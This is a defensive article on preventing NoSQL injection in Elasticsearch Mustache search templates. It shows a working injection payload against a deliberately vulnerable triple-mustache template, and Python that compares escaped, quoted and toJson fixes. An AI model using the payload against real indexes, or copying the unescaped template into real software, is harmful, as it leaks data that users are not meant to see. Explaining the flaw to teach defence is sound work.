
Preventing NoSQL injections with Elasticsearch


The list of security flaws reported against Elasticsearch is public, and NoSQL injection has never been one of them... so far.

There is, however, some literature on how to pull one off, and a few other discussions and resources on the subject are worth reading.

As a quick example, a NoSQL injection is definitely possible with search templates written in the Mustache templating language, as soon as a template inserts a user-controlled parameter without escaping. For instance, say we have the following two documents:

```
PUT attack/doc/1
{
  "field1": 2,
  "field2": 1
}

PUT attack/doc/2
{
  "field1": 2,
  "field2": 2
}
```

And a stored search template that filters on field1 and (wrongly) uses triple mustaches, `{{{field}}}`, which insert the parameter verbatim instead of JSON-escaping it the way a double mustache `{{field}}` would:

```
POST _scripts/attack
{
  "script": {
    "lang": "mustache",
    "source": """
{
  "query": {
    "bool": {
      "filter": [
        {
          "term": {
            "field1": {{{field}}}
          }
        },
        {
          "range": {
            "field2": {
              "gte": 2
            }
          }
        }
      ]
    }
  }
}
    """
  }
}
```

By passing a cleverly chosen value for the field parameter, we can leak the whole index instead of only the documents with field2 >= 2:

```
POST attack/_search/template
{
  "id": "attack",
  "params": {
    "field": "2}}],\"should\":[{\"range\":{\"field2\":{\"lte\":2}"
  }
}
```

The rendered query looks like this. The parameter closes the term clause and the filter array, then opens a should array containing a `lte: 2` range, into which the template's own `gte: 2` range now falls as well. Because the bool query still has a filter clause, minimum_should_match defaults to 0, so neither should clause restricts anything (and `lte: 2` together with `gte: 2` would match every value anyway); only the term filter on field1 is left, and both documents are returned instead of just document 2, i.e. the injected should clause basically leaks the whole index:

```
{
  "query" : {
    "bool" : {
      "filter" : [
        {
          "term" : {
            "field1" : 2
          }
        }
      ],
      "should" : [
        {
          "range" : {
            "field2" : {
              "lte" : 2
            }
          }
        },
        {
          "range" : {
            "field2" : {
              "gte" : 2
            }
          }
        }
      ]
    }
  }
}
```
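The whole chain from template to rendered query, reproduced offline. This is an added example and not code from the article or from Elasticsearch: it implements a minimal stand-in for the three Mustache constructs involved (`{{{x}}}` raw, `{{x}}` JSON-escaped, `{{#toJson}}x{{/toJson}}` serialised as JSON; the assumption is that Elasticsearch's real Mustache engine follows these same escaping rules, which is what its documentation describes), runs the article's payload through the vulnerable template and through hardened variants, and reports whether a should clause made it into the bool query. The template strings, the `analyse` helper and the variant names are constructed here for illustration.

```python
import json
import re

# Added example, not code from the original article. Assumption: Elasticsearch's
# Mustache engine escapes a double mustache as JSON, inserts a triple mustache
# raw, and serialises {{#toJson}}x{{/toJson}} as a JSON value; only those three
# constructs are modelled.

TAG = re.compile(
    r"\{\{#toJson\}\}(\w+)\{\{/toJson\}\}"   # {{#toJson}}name{{/toJson}}
    r"|\{\{\{(\w+)\}\}\}"                    # {{{name}}}  raw
    r"|\{\{(\w+)\}\}"                        # {{name}}    escaped
)


def json_escape(value):
    """Escape a value the way a double mustache does: quotes, backslashes and
    control characters can no longer terminate the surrounding JSON string."""
    return json.dumps(str(value))[1:-1]


def render(template, params):
    """Single-pass renderer for the three constructs above."""
    def substitute(match):
        tojson, raw, escaped = match.groups()
        if tojson:
            return json.dumps(params[tojson])
        if raw:
            return str(params[raw])
        return json_escape(params[escaped])
    return TAG.sub(substitute, template)


# The article's template in four variants (constructed, compacted to one line).
VULNERABLE = ('{"query":{"bool":{"filter":[{"term":{"field1": {{{field}}} }},'
              '{"range":{"field2":{"gte":2}}}]}}}')
# Escaped but still outside a JSON string: no structure can be injected, but the
# request breaks as soon as the value contains a quote.
UNQUOTED_ESCAPED = ('{"query":{"bool":{"filter":[{"term":{"field1": {{field}} }},'
                    '{"range":{"field2":{"gte":2}}}]}}}')
# Escaped and inside a JSON string: the value is always one term, whatever it is.
QUOTED = ('{"query":{"bool":{"filter":[{"term":{"field1": "{{field}}" }},'
          '{"range":{"field2":{"gte":2}}}]}}}')
# toJson: the parameter is serialised as a single JSON value, keeping its type.
TOJSON = ('{"query":{"bool":{"filter":[{"term":{"field1": {{#toJson}}field{{/toJson}} }},'
          '{"range":{"field2":{"gte":2}}}]}}}')

# The article's payload, exactly as the client sends it inside "params".
PAYLOAD = '2}}],"should":[{"range":{"field2":{"lte":2}'


def analyse(template, params):
    """Render the template and report whether the result is valid JSON, whether a
    should clause was smuggled in (and how many clauses it holds), and which value
    ended up in the term filter on field1."""
    rendered = render(template, params)
    try:
        query = json.loads(rendered)
    except json.JSONDecodeError:
        return {"parsed": False, "injected": False, "should_clauses": 0, "field1": None}
    bool_query = query["query"]["bool"]
    return {
        "parsed": True,
        "injected": "should" in bool_query,
        "should_clauses": len(bool_query.get("should", [])),
        "field1": bool_query["filter"][0]["term"]["field1"],
    }


if __name__ == "__main__":
    variants = [("vulnerable", VULNERABLE), ("unquoted+escaped", UNQUOTED_ESCAPED),
                ("quoted", QUOTED), ("toJson", TOJSON)]
    for name, template in variants:
        print(f"{name:17} legit value 2 -> {analyse(template, {'field': 2})}")
        print(f"{name:17} payload       -> {analyse(template, {'field': PAYLOAD})}")
```

Running it shows the four outcomes side by side: only the triple-mustache template parses with an extra should clause; the escaped-but-unquoted template turns the payload into a parse error, which is a denial of the request rather than an injection; the quoted double mustache and `toJson` both keep the payload as a single, harmless term value, and `toJson` additionally preserves numeric parameters as numbers. Escaping only prevents structural injection, so the application should still validate the parameter's type before it reaches the template, otherwise a garbage string sent to a numeric field simply fails the query.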